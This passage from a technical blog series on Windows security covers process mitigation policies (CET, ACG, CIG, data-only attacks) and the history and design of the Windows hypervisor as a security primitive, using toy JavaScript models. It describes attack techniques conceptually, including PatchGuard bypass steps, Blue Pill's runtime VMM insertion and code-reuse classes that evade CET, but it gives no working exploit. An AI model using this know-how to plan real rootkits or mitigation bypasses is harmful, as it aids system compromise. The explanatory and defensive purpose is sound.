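  HEAP_TERMINATE: 12n,
  BOTTOM_UP_ASLR: 16n,
  HIGH_ENTROPY_ASLR: 20n,
  STRICT_HANDLE_CHECKS: 24n,
  WIN32K_SYSTEM_CALL_DISABLE: 28n,
  EXTENSION_POINT_DISABLE: 32n,
  PROHIBIT_DYNAMIC_CODE: 36n,
  CONTROL_FLOW_GUARD: 40n,
  BLOCK_NON_MICROSOFT_BINARIES: 44n,
  FONT_DISABLE: 48n,
  IMAGE_LOAD_NO_REMOTE: 52n,
};

// Labels are this sketch's own; value 3 is reserved or policy-specific.
const STATES = ['DEFER', 'ALWAYS_ON', 'ALWAYS_OFF', 'RESERVED_OR_SPECIFIC'];

function decodeMitigationOptions(options) {
  const decoded = {};
  for (const [name, shift] of Object.entries(FIELD_OFFSETS)) {
    const field = Number((options >> shift) & 0x3n); // isolate the 2-bit field
    decoded[name] = STATES[field];
  }
  return decoded;
}

// Hypothetical sample: ACG and CFG forced on, font-disable forced off.
const sample = (1n << 36n) | (1n << 40n) | (2n << 48n);
console.log(decodeMitigationOptions(sample));
```

Reading the field rather than a single bit matters because a policy forced off is also a non-zero field.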

Stack the recipe. Document the gaps. Watch the FAQ below for the common misconceptions you will hit on the way.

16. Frequently asked questions

On x64 Windows, DEP is unconditionally on for all processes. `ProcessDEPPolicy` in `SetProcessMitigationPolicy` is a 32-bit-only vestigial knob, retained because some 32-bit legacy code is still in production [@ms-setprocessmitigationpolicy]. For new code on x64, you do not need to touch the DEP policy; the only useful per-process refinement is `ProcessASLRPolicy` (specifically `ForceRelocateImages` and `HighEntropy`), to insist on high-entropy randomization even when third-party DLLs were built without `/DYNAMICBASE`.

No. They attack different surfaces. CIG (`ProcessSignaturePolicy`) prohibits *loading unsigned images*. ACG (`ProcessDynamicCodePolicy`) prohibits *generating new executable code at runtime*. An attacker who finds a signed-but-vulnerable DLL bypasses CIG but does not bypass ACG. An attacker who finds a JIT-spray primitive in an in-process JIT bypasses ACG but does not bypass CIG (because they are not loading a new DLL). The two are orthogonal, and a hardened process needs both [@miller-acg-blog, @ms-binary-signature-policy, @ms-dynamic-code-policy].

No. The MSVC `/guard:xfg` flag exists. The `__guard_xfg_dispatch_icall_fptr` thunk exists in `ntdll.dll`. The instrumentation is in some binaries. Enforcement-by-default never shipped, and Connor McGarr's Black Hat USA 2025 deck describes XFG as "deprecated" [@mcgarr-bhusa25]. Microsoft's strategic direction is hardware-backed CET shadow stack for the backward edge plus kCFG and kCET in the kernel; fine-grained forward-edge protection on Windows in 2026 means LLVM's `-fsanitize=cfi-icall` on opted-in builds, not XFG.

Only the return-edge variant. CET shadow stack catches any attempt to corrupt a return address on the regular stack and then return through it [@cet-techcommunity-wayback]. *Call-oriented programming* (COP, chains of `call`-terminated gadgets) and *jump-oriented programming* (JOP, chains of `jmp`-terminated gadgets) preserve the call/return invariant -- the gadgets do not return through corrupted stack frames -- so CET sees nothing. COOP (section 5) chains entire legitimate virtual function calls with matching call/return pairs; CET also sees nothing [@coop-ieeesecurity-pdf]. CET stops *classical* ROP. It does not stop code-reuse exploitation in general.

Because ACG, enabled in Edge in Windows 10 1703 (March 2017), made in-process JIT a `STATUS_DYNAMIC_CODE_BLOCKED` error [@miller-acg-blog]. The Chakra JIT (then later V8 when Edge moved to Chromium) was rearchitected to run in a separate JIT process that compiles JavaScript and ships the compiled code back to the renderer via an authenticated IPC channel plus a signed-section mapping. The renderer maps the signed section read-execute via `MapViewOfFile`; nothing in the renderer ever calls `VirtualAlloc(PAGE_EXECUTE_*)`. Section 8 walks the architecture in detail.

They constrain the exploit chain but do not fix the root-cause bug. Data-oriented attacks (DOP, section 13) are Turing-complete and survive every CFI variant because no control flow is ever hijacked [@dop-paper]. Signed-but-vulnerable DLLs survive CIG. ACG plus CIG closes the *code* dimension on a hardened process, but a sufficiently-determined attacker who finds a write-what-where primitive can still build a data-only exploit chain in any nontrivial program. The long-term answer is memory-safe languages; Microsoft has been publicly committing to Rust in Windows since 2019, and Matt Miller's BlueHat IL 2019 talk gave the structural justification: "~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues" [@miller-bhil-pdf]. The short-term answer is the recipe in section 15: stack the mitigations, document the gaps, and treat memory-safety as the limit you are working against.
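The return-edge distinction in the CET answer can be made concrete with a toy model. The class and function names below are hypothetical, and the model covers only the shadow-stack comparison on return. It does not model gadgets, forward-edge checks such as CFG, or anything else a real exploit would have to get past.

```javascript
// Toy shadow-stack model. 'call' records the return address on both stacks,
// 'ret' compares them and faults on a mismatch, 'jmp' touches neither stack.
class ToyCpu {
  constructor() {
    this.stack = [];  // ordinary stack: reachable by an attacker's write primitive
    this.shadow = []; // shadow stack: not writable by ordinary stores
  }
  call(returnAddress) {
    this.stack.push(returnAddress);
    this.shadow.push(returnAddress);
  }
  ret() {
    const fromStack = this.stack.pop();
    const fromShadow = this.shadow.pop();
    if (fromStack !== fromShadow) {
      throw new Error('control-protection fault: return address mismatch');
    }
    return fromStack;
  }
  jmp(target) {
    return target; // indirect jump: no return address involved, nothing to compare
  }
}

// Classical ROP: overwrite a saved return address, then return through it.
function tryRop() {
  const cpu = new ToyCpu();
  cpu.call(0x1000);
  cpu.stack[cpu.stack.length - 1] = 0xdead; // corrupt the saved return address
  try {
    cpu.ret();
    return 'undetected';
  } catch (e) {
    return 'blocked';
  }
}

// JOP-style chain: attacker-chosen targets reached only through indirect jumps.
function tryJop() {
  const cpu = new ToyCpu();
  cpu.call(0x1000);
  try {
    cpu.jmp(0xdead);
    cpu.jmp(0xbeef);
    return 'undetected';
  } catch (e) {
    return 'blocked';
  }
}

console.log('ROP:', tryRop());
console.log('JOP:', tryJop());
```

The jump chain never executes a return through a corrupted frame, so the only check in this model never fires.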

The bug is still there. The exploit is just much harder. The article ends where it began: a renderer process that survived an info-leak-plus-write-what-where chain because six per-process mitigations all held at once. That is what Windows process mitigation policies do.

Above Ring Zero: How the Windows Hypervisor Became a Security Primitive

noreply@paragmali.com (Parag Mali) — Sun, 10 May 2026 00:00:00 GMT

**The Windows hypervisor is the program that loaded before Windows did.** It runs at a privilege level the Windows kernel cannot reach and owns the page tables that decide which memory the Windows kernel may even see. Virtualization-Based Security, Credential Guard, HVCI (Memory Integrity in Windows Security), Application Control, VBS Enclaves, and System Guard Secure Launch are all built by composing five primitives the hypervisor exposes -- partitions, hypercalls, intercepts, SynIC, and per-VTL SLAT. The substrate is real, alive, and producing two to four public CVEs per year; the residual attack surface (firmware below, side channels above, IOMMU bypass beside, hypervisor rollback) is where Windows security still earns its hardest miles.

1. Above Ring Zero

On a Windows 11 machine with VBS turned on, a kernel-mode driver running with full Ring-0 privilege cannot read a single byte of the LSASS process's credential cache. It cannot load an unsigned driver. It cannot patch ntoskrnl.exe. It cannot disable HVCI without a reboot. None of this is enforced by Windows. It is enforced by a different program -- one that loaded before Windows did, that runs at a privilege level the Windows kernel cannot reach, and that owns the page tables that say which memory the Windows kernel may even see. That program is the Windows hypervisor [@ms-hyperv-architecture, @ms-tlfs-vsm].

The intuition this fact violates is older than most readers' careers. "SYSTEM owns the box." Every introductory security course teaches it. Local administrator escalates to SYSTEM, SYSTEM loads a driver, the driver runs in the kernel, and the kernel can do anything to the machine. That model is correct for a Windows installation running without Virtualization-Based Security. It is wrong, in three specific and load-bearing ways, for a Windows installation that has VBS turned on.

Virtualization-Based Security (VBS): A Windows security architecture that uses the Hyper-V hypervisor to create a small, isolated execution environment alongside the normal Windows operating system. The hypervisor allocates a portion of memory, configures its second-level page tables to make that memory unreadable and unwritable from normal kernel mode, and runs Microsoft-signed code there -- the Secure Kernel and isolated user-mode trustlets -- that the regular NT kernel cannot reach. Credential Guard, HVCI, Application Control, and System Guard all sit on top of this primitive [@ms-tlfs-vsm].

The binary in question is named hvix64.exe on Intel hosts and hvax64.exe on AMD hosts. It is loaded by hvloader.efi before winload.exe ever runs. By the time the Windows boot manager hands control to the NT kernel, the hypervisor has already configured the CPU's virtualization extensions, allocated its own private memory, taken ownership of the IOMMU, and set up the per-partition second-level page tables that decide which physical pages each partition can see [@ms-tlfs-pdf]. From the NT kernel's point of view, the machine starts up already inside a guest partition. There is no escape upward.

Loose security writing sometimes calls the hypervisor's privilege level "Ring -1." That phrase is colloquial. Intel's manuals say "VMX root operation"; AMD's manuals say "SVM host mode." Both terms denote a CPU operating mode that sits architecturally outside the four-ring privilege stack the guest OS sees, not a fifth ring inside it.

This article is about the program that loaded first. The siblings in this series -- on the Secure Kernel, on Credential Guard and NTLMless, on Secure Boot, and on Adminless -- all assume what this article explains. Each of them describes a policy: the Secure Kernel enforces code integrity; Credential Guard isolates LSASS; Adminless raises the bar on local administrator. None of those policies would be enforceable without a piece of software running at a privilege level the policy's adversary cannot reach. The hypervisor is that piece of software, and "security primitive" is how Microsoft, the security research community, and the bug-bounty market all describe its current role.

By the end of this article you will know five things. First, why the hypervisor became a security primitive -- the architectural failure of Ring-0 defenses that Microsoft fought for a decade and finally gave up on in 2015. Second, how it became one, in three steps: Popek and Goldberg's 1974 virtualizability theorem; Intel VT-x and AMD-V in 2005-2006; and David Hepkin and Arun Kishan's 2013 patent on hierarchical Virtual Trust Levels [@us9430642b2-patent]. Third, what it enforces, feature by feature, with the hypervisor primitive that backs each: HVCI rides on per-VTL SLAT; Credential Guard rides on SynIC plus the secure-call ABI; System Guard Secure Launch rides on DRTM [@ms-system-guard-secure-launch]. Fourth, where it has actually failed in public -- six worked CVEs across three distinct attack classes, all narrowly localized. Fifth, what is structurally outside its mandate: firmware below the hypervisor, microarchitectural side channels above it, IOMMU bypass beside it, and hypervisor rollback through the update pipeline.

The story is half engineering and half conceptual inversion. How did a server-consolidation hypervisor that shipped in 2008 with Windows Server 2008 -- a product whose original marketing pitch was "run more VMs per box" -- become the architectural substrate that protects every load-bearing Windows security boundary in 2026? The answer begins in 1974, with a paper that defined what a hypervisor even is. But the political and engineering thread begins five years before Hyper-V shipped, in San Mateo, California.

2. Origins -- Connectix to Viridian to Hyper-V

Microsoft entered the virtualization market three years late and by acquisition. On February 19, 2003, the company bought Connectix, a small San Mateo software house founded in 1988 that had built Virtual PC for Macintosh and, later, Virtual PC for Windows. The Connectix engineers became the nucleus of what Microsoft would internally call the Windows Server Virtualization team. The acquired products shipped as Microsoft Virtual PC 2004 and Microsoft Virtual Server 2005. Both were Type-2 hypervisors -- user-mode applications that ran on top of Windows, using software techniques rather than CPU virtualization extensions, because the CPU virtualization extensions did not yet exist on shipping x86 hardware.

Type-1 hypervisor: A hypervisor that runs directly on hardware rather than as an application on top of a host operating system. The hypervisor owns the CPU, the second-level page tables, and (in the security-relevant case) the IOMMU; guest operating systems run at a lower privilege level, in partitions or virtual machines that the hypervisor schedules and isolates. IBM's CP-67/CMS in 1968 is the genre's origin; VMware ESX, Xen, and the Microsoft hypervisor (`hvix64.exe`/`hvax64.exe`) are the modern examples [@wp-hypervisor].

In 2005, the team began a new project under the codename "Viridian." The goal was a Type-1 micro-kernelized hypervisor for x86-64 -- a fresh build, not a derivative of Virtual Server -- that required hardware virtualization extensions at install time. Intel's VT-x had shipped in November 2005 with the Pentium 4 662/672; AMD-V had shipped on May 23, 2006 with the Socket AM2 platform, initially available across Athlon 64 X2 and Athlon 64 FX and select Athlon 64 models. Both were now broadly enough deployed that Microsoft could make hardware virtualization a system requirement rather than a configuration option. Three years later, on June 26, 2008 (Wikipedia's body text gives this date; the infobox states June 28), Hyper-V reached RTM and was delivered as a Windows Server 2008 feature through Windows Update [@wp-hyperv].

Microsoft ships two hypervisor binaries: hvix64.exe for Intel hosts (using VT-x) and hvax64.exe for AMD hosts (using AMD-V). The instruction-set-architecture divergence is real -- Intel uses vmcall to enter the hypervisor; AMD uses vmmcall -- but the hypercall ABI surface above that single instruction is identical, so the rest of the Microsoft hypervisor codebase is shared between the two binaries.

The 2008 design choices are worth naming individually because the ones that mattered for server consolidation turned out, seven years later, to also be the ones that mattered for security. Three deserve flagging:

Micro-kernelized architecture. The hypervisor binary contains only the minimum machinery needed to virtualize the CPU, schedule VMs, and enforce memory isolation. It does not contain device drivers. It does not contain a network stack. It does not contain a filesystem.
Root partition plus child partitions. From the Microsoft architecture documentation: "The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems" [@ms-hyperv-architecture]. The root partition is a full Windows install; the child partitions are guest VMs.
VMBus, VSP, and VSC. Inter-partition I/O happens over the VMBus -- a paravirtualized message channel. A Virtualization Service Provider (VSP) runs in the root partition and owns the real device; a Virtualization Service Client (VSC) runs in each child partition and talks to the VSP over VMBus. Device emulation lives in the root partition's user-mode and kernel-mode code, not in the hypervisor binary itself. This is the choice that, seven years later, kept the hypervisor's Trusted Computing Base small enough to be defensible.

flowchart TD
  subgraph Root["Root partition (Windows Server)"]
    RD["Real device drivers"]
    VSP["Virtualization Service Providers"]
    VMM["VM Worker Processes (vmwp.exe)"]
  end
  subgraph Child1["Child partition 1 (guest OS)"]
    VSC1["Virtualization Service Clients"]
    Guest1["Guest kernel + apps"]
  end
  subgraph Child2["Child partition 2 (guest OS)"]
    VSC2["Virtualization Service Clients"]
    Guest2["Guest kernel + apps"]
  end
  HV["Microsoft Hypervisor (hvix64.exe / hvax64.exe)"]
  HW["Hardware (CPU, RAM, NIC, disk)"]
  Root -. VMBus .- Child1
  Root -. VMBus .- Child2
  Root --> HV
  Child1 --> HV
  Child2 --> HV
  HV --> HW

The micro-kernel, root-plus-child, and VMBus choices were defensible server engineering. The rationale was that emulating a NIC, a SCSI controller, or a graphics adapter inside the hypervisor binary would balloon the binary's size, lock its code-review cycles to those of every device the company shipped, and force the same security-critical code that scheduled CPUs to also handle Ethernet frame parsing. Putting device emulation in a normal Windows process inside the root partition -- the VM Worker Process vmwp.exe -- meant the hypervisor binary could stay small enough to reason about.

The 2008 design goal was, again, server consolidation. Microsoft's positioning materials at the time named "run more VMs per box, get better hardware use" as the customer pitch. Nothing in the 2008 Hyper-V documentation describes the hypervisor as a security primitive for the host OS. The security re-purposing -- the moment Hyper-V's hardware-privilege isolation became the way Windows itself protected its own kernel from itself -- did not arrive until 2015. To understand why it arrived at all, we have to back up thirty-four years to a 1974 paper that defined what virtualization formally requires.

3. The Theoretical Anchor -- Popek, Goldberg, and SLAT

Before Microsoft could build a hypervisor that ran security-critical code at a higher privilege than the Windows kernel, two unrelated decisions had to land. One was made in 1974, by two researchers who would never see Windows. The other was made in 2005, by Intel.

In July 1974, Gerald Popek of UCLA and Robert Goldberg of Harvard published "Formal Requirements for Virtualizable Third Generation Architectures" in Communications of the ACM. The paper laid down three properties any "true" virtual machine monitor must satisfy:

Equivalence. Programs run on the VMM exhibit behavior essentially identical to behavior on the bare machine, except for differences due to timing and resource availability.
Resource control. The VMM, not the guest, controls the system resources -- CPU time slices, memory, devices.
Efficiency. A statistically dominant subset of the instruction stream executes directly on hardware, without VMM intervention.

The theorem that gave the paper its lasting reputation followed from those properties. Let a sensitive instruction be one that either reads or modifies privileged state (the processor's mode bits, page-table base register, interrupt mask). Let a privileged instruction be one that traps when executed in user mode. Then a sufficient condition for an ISA to be virtualizable is that every sensitive instruction is privileged. The intuition is simple: the VMM must get a chance to see -- and to handle -- every guest action that touches the machine's privileged state. If the CPU silently lets the guest do something privileged-feeling without trapping, the VMM cannot maintain equivalence and control simultaneously.

Classical (Popek-Goldberg) virtualizability: A property of a processor architecture: every sensitive instruction in the instruction set is privileged. An architecture with this property can be virtualized "classically" -- with a thin trap-and-emulate hypervisor whose only entry points are the traps the CPU raises on privileged-instruction violations. An architecture without this property requires software workarounds (binary translation, paravirtualization) or hardware extensions (VT-x, AMD-V) before a Popek-Goldberg-style VMM can be built.

For three decades, x86 was famously not virtualizable in the Popek-Goldberg sense. John Robin and Cynthia Irvine enumerated the problem in their 2000 USENIX Security paper: seventeen protected-mode instructions on the IA-32 architecture either read or modified privileged state without trapping from user mode. VMware Workstation, released in 1999 by VMware Inc. (which had been founded the year prior by Mendel Rosenblum, Diane Greene, Scott Devine, Ellen Wang, and Edouard Bugnion), worked around the problem with binary translation: it dynamically rewrote each protected-mode guest instruction stream to substitute or trap the seventeen offenders. The technique imposed double-digit overhead, made debugging miserable, and was a security liability in its own right -- the binary translator itself was a parser of arbitrary attacker-controlled code.

The Robin and Irvine enumeration includes instructions like SGDT (store global descriptor table register), SIDT (store interrupt descriptor table register), SLDT (store local descriptor table register), SMSW (store machine status word), and PUSHF/POPF (push/pop flags including IOPL). Each of these silently returned or accepted privileged state from user mode without raising a fault. The aggregate effect was that no classical Popek-Goldberg VMM could correctly virtualize an unmodified x86 guest -- every one of those seventeen instructions was a hole the VMM could not see through.
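The sufficient condition is a subset test, and can be written as one. The table below is a small illustrative sample rather than the full Robin and Irvine list: the unprivileged-but-sensitive entries are the ones named above, while MOV CR3, LGDT, and ADD are added here as contrast cases. The function names and the "patched" ISA are hypothetical.

```javascript
// Check the Popek-Goldberg sufficient condition on a toy instruction table:
// every sensitive instruction must also be privileged (trap in user mode).
const preVtX86 = [
  { name: 'MOV CR3', sensitive: true, privileged: true },  // contrast case: traps
  { name: 'LGDT', sensitive: true, privileged: true },     // contrast case: traps
  { name: 'SGDT', sensitive: true, privileged: false },
  { name: 'SIDT', sensitive: true, privileged: false },
  { name: 'SLDT', sensitive: true, privileged: false },
  { name: 'SMSW', sensitive: true, privileged: false },
  { name: 'PUSHF', sensitive: true, privileged: false },
  { name: 'POPF', sensitive: true, privileged: false },
  { name: 'ADD', sensitive: false, privileged: false },    // contrast case: harmless
];

// Sensitive instructions that do not trap are the holes the VMM cannot see.
function violations(isa) {
  return isa.filter((insn) => insn.sensitive && !insn.privileged)
            .map((insn) => insn.name);
}

function isClassicallyVirtualizable(isa) {
  return violations(isa).length === 0;
}

// Hypothetical ISA in which every sensitive instruction has been made to trap.
const patched = preVtX86.map((insn) => ({
  ...insn,
  privileged: insn.privileged || insn.sensitive,
}));

console.log('pre-VT x86 holes:', violations(preVtX86).join(', '));
console.log('pre-VT x86 virtualizable?', isClassicallyVirtualizable(preVtX86));
console.log('patched ISA virtualizable?', isClassicallyVirtualizable(patched));
```

Binary translation and the later hardware extensions are two different ways of making the first list come back empty.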

Intel and AMD ended the problem in hardware. Intel VT-x (codename Vanderpool, November 2005) and AMD-V (codename Pacifica, May 2006) added a new CPU mode -- VMX root operation for Intel, SVM host mode for AMD -- and a new instruction-emulation mechanism. A VM exit could be configured to fire on every sensitive instruction the hypervisor wished to intercept, transferring control to the host with a structured exit reason and an opaque, host-controlled snapshot of guest state. After 2006, x86-64 became Popek-Goldberg-virtualizable in hardware [@wp-x86-virtualization].

sequenceDiagram
  participant Guest as Guest OS (VMX non-root)
  participant CPU as CPU hardware
  participant HV as Hypervisor (VMX root)
  Guest->>CPU: MOV CR3, rax (sensitive instr)
  CPU->>HV: VM-EXIT (reason 28: CR access)
  HV->>HV: Read VMCS exit-qualification
  HV->>HV: Validate, emulate, update SLAT
  HV->>CPU: VMRESUME
  CPU->>Guest: Continue guest at next instruction

One architectural element more was needed before any of this could be a security primitive rather than just a virtualization primitive. Classical x86 paging maps a guest virtual address to a physical address through a single CPU-walked page table. In a virtualized system that single table cannot be enough, because the guest needs its own virtual-to-physical map and the host needs to remap the guest's "physical" address to a real machine-physical address. The first generations of VT-x simulated this two-level mapping in software through shadow page tables, which the hypervisor had to maintain alongside the guest's tables on every page-table edit. Shadow paging was correct but slow, and it gave the hypervisor no clean way to enforce a different memory map for different parts of the same guest.

Second-Level Address Translation (SLAT) -- Intel's Extended Page Tables (EPT, shipped with Nehalem in November 2008) and AMD's Nested Page Tables (NPT, shipped with the Barcelona-generation Opteron on September 10, 2007) -- solved both problems in hardware. The guest walks its own page table from virtual to "guest physical"; the CPU then walks a second, hypervisor-owned page table from "guest physical" to "system physical." Two key properties follow. First, the hypervisor has exclusive control of the second-level mapping; the guest cannot read, write, or even know that it exists. Second, because the second-level mapping is per-partition, the hypervisor can give two partitions different views of the same machine physical memory -- the same page can be readable in one partition and entirely absent in another.
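A toy model can make the two-stage walk and the per-partition property concrete. The sketch below is illustrative JavaScript, not hypervisor code: real hardware walks multi-level radix trees, whereas here each table is a flat `Map`, and the 4 KiB page size and every name (`translate`, `guestPageTable`, `slatA`, `slatB`) are assumptions made for the example.

```javascript
// Toy model of second-level address translation (SLAT).
// Each "page table" is a flat Map from page number to page number.
const PAGE_SHIFT = 12n;                       // 4 KiB pages (model assumption)
const PAGE_MASK = (1n << PAGE_SHIFT) - 1n;

// Stage 1: guest-owned table, guest-virtual page -> guest-physical page.
// Stage 2: hypervisor-owned table, guest-physical page -> system-physical page.
function translate(guestPageTable, slat, gva) {
  const offset = gva & PAGE_MASK;
  const gpaPage = guestPageTable.get(gva >> PAGE_SHIFT);
  if (gpaPage === undefined) return { fault: 'guest page fault' };
  const spaPage = slat.get(gpaPage);
  if (spaPage === undefined) return { fault: 'SLAT violation (VM exit)' };
  return { spa: (spaPage << PAGE_SHIFT) | offset };
}

// Both partitions use the same guest-side mapping...
const guestPageTable = new Map([[0x10n, 0x2n]]);
// ...but the hypervisor gives them different second-level views.
const slatA = new Map([[0x2n, 0x7fn]]);       // partition A: page present
const slatB = new Map();                      // partition B: page absent

const inA = translate(guestPageTable, slatA, 0x10abcn);
const inB = translate(guestPageTable, slatB, 0x10abcn);
console.log(inA.spa.toString(16));            // 7fabc
console.log(inB.fault);                       // SLAT violation (VM exit)
```

The guest-side table is identical in both calls; only the hypervisor-owned second table differs, which is the whole point of the second property.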

Second-Level Address Translation (SLAT): A hardware feature on Intel (EPT) and AMD (NPT) CPUs that lets the hypervisor maintain a second page table mapping guest-physical addresses to system-physical addresses. The CPU walks the guest's own page table for the virtual-to-guest-physical mapping, then walks the hypervisor's table for the guest-physical-to-system-physical mapping. Because the second table is hypervisor-controlled and per-partition, the hypervisor can give different partitions -- and, in VBS, different Virtual Trust Levels inside the same partition -- different views of physical memory. SLAT is the bedrock of VTL memory protection [@ms-tlfs-pdf].

Hyper-V required VT-x or AMD-V at install time from day one. SLAT has been a requirement of client Hyper-V since Windows 8 and became mandatory for the server role with Windows Server 2016 [@ms-hyperv-architecture].

Popek and Goldberg gave us the property. Intel and AMD gave us the hardware. Microsoft used both to build a server hypervisor in 2008. But for the first seven years of Hyper-V's life, none of that machinery protected Windows from itself. Microsoft hadn't yet noticed the architectural problem that made it necessary -- or rather, they had noticed the problem (PatchGuard's bypass record was public) and had not yet conceded that the problem was structural. The concession came in 2015. What forced it was the same-privilege paradox.

4. The Same-Privilege Paradox -- Why PatchGuard Was Never Enough

PatchGuard, which Microsoft shipped in 2005 with Windows Server 2003 SP1 x64, ran inside ntoskrnl.exe at Ring 0 and scanned a curated list of kernel structures -- the system service dispatch table, the interrupt descriptor table, the kernel image's .text section -- at randomized intervals to detect tampering. It was bypassed within months by Skywing's Uninformed writeups. Microsoft kept shipping it. Researchers kept bypassing it. The pattern lasted a decade. The reason is not that PatchGuard's authors were sloppy [@wp-kpp]. The reason is structural, and naming it correctly is the first of the three insights this article is built around.

Key idea: Any defense reachable by mov from Ring 0 is defeasible by mov from Ring 0.

The intuition is simple. PatchGuard is a piece of code. It lives in the kernel's virtual address space at some page. It owns a timer that re-runs it periodically. It maintains a randomization seed for which structures it checks next. It has a callback path into KeBugCheckEx if it detects tampering. Every one of those four assets -- the code page, the timer callback, the randomization seed, the bug-check path -- is a kernel data structure or a kernel virtual address. An attacker with Ring-0 code execution can locate each of them by searching the same kernel address space PatchGuard searches. They can patch the callback so the timer no-ops. They can patch the seed so the randomization is predictable. They can patch the bug-check path so it reports success. They can do all of this with a sequence of plain mov instructions. PatchGuard cannot defend against this, because PatchGuard's defenses live in the same place its attacker's writes do.

PatchGuard and its attacker are colleagues, not adversaries. They share an office. The office is `ntoskrnl.exe`'s virtual address space, and there is no key on the door.

This is the same-privilege paradox. It is not an implementation bug. It does not yield to better obfuscation, more randomization, or harder-to-find timers. It is an architectural ceiling. A defense at privilege level $P$ cannot be enforced against an attacker who also runs at privilege level $P$, because the defender's state lives in the attacker's address space. The defender can be made expensive to find; it cannot be made impossible to find, because the attacker has the same instructions, the same address-space view, and the same MMU privileges as the defender.
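The argument can be caricatured in a few lines of JavaScript. This is a deliberately crude sketch under stated assumptions: "memory" is a plain object, the "attacker" is any code holding a reference to it, and the higher-privilege boundary is stood in for by a closure variable the attacker has no reference to. None of the names correspond to real PatchGuard internals.

```javascript
// Same privilege: the guard's on/off switch lives in the memory it guards.
function makeSamePrivilegeSystem() {
  const memory = { dispatchTable: 'original', guardEnabled: true };
  const guard = () => {
    if (!memory.guardEnabled) return 'skipped';
    return memory.dispatchTable === 'original' ? 'clean' : 'bugcheck';
  };
  return { memory, guard };
}

// Higher privilege: the guard's reference value is not reachable through
// `memory`, so the attacker's writes cannot touch it.
function makeHigherPrivilegeSystem() {
  const memory = { dispatchTable: 'original' };
  const expected = 'original';
  const guard = () => (memory.dispatchTable === expected ? 'clean' : 'tampered');
  return { memory, guard };
}

// The attacker can write to anything reachable through `memory`.
function attack(memory) {
  memory.guardEnabled = false;      // disable the defender, if it lives here
  memory.dispatchTable = 'hooked';  // then do the actual tampering
}

const same = makeSamePrivilegeSystem();
attack(same.memory);
const higher = makeHigherPrivilegeSystem();
attack(higher.memory);

console.log(same.guard());   // skipped
console.log(higher.guard()); // tampered
```

In the first system the same two writes that tamper with the table also silence the check. In the second, the tampering still happens but can no longer hide.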

Note: The same-privilege paradox is a property of where the defense lives, not of how clever the defense is. PatchGuard's authors did add randomization. They did add multiple decoy callbacks. They did add cryptographically derived integrity checks. None of those reductions changes the basic fact that the attacker, holding the same Ring-0 privilege, can locate and edit each of them. The architectural fix is not better PatchGuard. The architectural fix is moving the defender to a privilege level the attacker cannot reach.

Once the paradox is named, the defender's choice is binary. Either give up on having a defense at all -- treat Ring 0 as a free-fire zone where any malware that gets there has won -- or move the defender to a privilege level above Ring 0, at a hardware boundary the attacker's mov instructions cannot cross. Microsoft picked the second. It is the only architecturally honest choice.

To make it work, Microsoft needed three things. The first was a hypervisor already deployed on every Windows install. They had that since 2008. The second was a way to put a piece of Windows itself -- code, data, secrets -- inside the hypervisor's protection without spawning a separate VM, because spawning a separate VM doubles the system's resource cost and forces every Windows process to choose between living on the normal side or the secure side. That required an architectural idea that did not yet exist in 2010: a way to split a single partition into two privilege levels, each with its own SLAT mapping and its own register state. The third was a way to ensure the hypervisor itself could not be silently replaced or rolled back beneath the OS. That required a hardware-rooted measurement -- a DRTM event -- that the OS could attest to.

The architectural idea is the subject of section 6. The DRTM measurement is the subject of section 11. Both of them required a decade-long conversation about whether the hypervisor itself could be trusted at all -- a conversation that ran in parallel during the same years and that briefly seemed to argue the opposite case. We turn to that conversation next.

5. The Hyperjacking Era -- SubVirt, Blue Pill, and CloudBurst

While Microsoft was finishing Hyper-V, the security community was establishing that a hypervisor was not just a defense -- it was also the most powerful possible attacker against the OS sitting above it. Three demonstrations in three years made the point unmistakable.

SubVirt. In May 2006, Samuel King and Peter Chen at the University of Michigan, joined by Yi-Min Wang, Chad Verbowski, Helen Wang, and Jacob Lorch at Microsoft Research, presented "SubVirt: Implementing Malware with Virtual Machines" at IEEE S&P [@king-subvirt-2006]. Their construction was a Virtual Machine Based Rootkit (VMBR). A privileged installer running inside a legitimate OS installed a malicious VMM at boot time; on the next reboot, the malicious VMM ran first, brought up the original OS as a guest on top of it, and gained the privileged position of seeing every CPU instruction, every memory access, and every I/O the OS performed. The original OS had no architectural way to tell it was no longer the most-privileged software on the box. SubVirt was demonstrated against Windows XP (using Microsoft Virtual PC as the malicious VMM substrate) and against Linux (using VMware Workstation), specifically to show that the technique was not tied to any one operating system or any one hypervisor product.

Blue Pill. Three months later, at Black Hat USA 2006, Joanna Rutkowska of COSEINC demonstrated "Subverting Vista Kernel for Fun and Profit" [@wp-blue-pill]. Her tool, codenamed Blue Pill, took a step beyond SubVirt by doing the VMM insertion at runtime rather than at boot. The technique: a Ring-0 driver, running inside an already-booted Windows install on an AMD-V capable host, executed VMRUN against an attacker-controlled Virtual Machine Control Block (VMCB) whose initial state matched the current physical CPU. The CPU dropped out of SVM host mode and re-entered as a guest under the attacker's VMM. The OS continued running normally, with no boot-loader modification and no reboot.

In 2007, Rutkowska and Alexander Tereshkin returned to Black Hat USA with the more polished "IsGameOver(,) Anyone?" presentation, refining the technique and addressing the early critics' detection ideas [@wp-blue-pill]. Rutkowska's marketing claim that Blue Pill was "100% undetectable" attracted a public counter-effort: in 2007, Edgar Barbosa, Nate Lawson, Peter Ferrie, and Tom Ptacek all proposed detection techniques relying on side channels (timing artifacts of trapped instructions, TSC skew, structural differences in how RDTSC behaves under VT-x). The claim softened in subsequent publications, but the underlying point survived: a hostile thin hypervisor below a victim OS can be made arbitrarily difficult to detect from inside that OS, and the only architecturally clean way to know what you are running under is to measure the boot chain before the OS starts.

CloudBurst. At Black Hat USA 2009, Kostya Kortchinsky of Immunity Inc. presented CLOUDBURST. It was the first publicly demonstrated arbitrary-code-execution guest-to-host escape against a commercial hypervisor: a heap overflow in VMware's emulated SVGA-II graphics adapter, tracked as CVE-2009-1244 [@nvd-cve-2009-1244]. A guest VM, executing entirely inside a VMware-managed user-mode process on the host, could overflow a buffer in that process and gain host code execution. CloudBurst's lasting operational lesson was not the specific bug but the attack surface: device emulation -- not the trap-and-emulate core of the hypervisor -- is the largest piece of guest-attacker-controlled code in any commercial VMM. Every Hyper-V guest-to-host escape Microsoft has shipped a patch for since 2018 lands in either this device-emulation surface or the hypercall input-validation surface that mediates the same kinds of structured guest-controlled input.

```mermaid
flowchart TD
    subgraph Before["Before hyperjacking"]
        OS1["Victim OS"]
        FW1["Firmware (UEFI)"]
        HW1["Hardware"]
        OS1 --> FW1
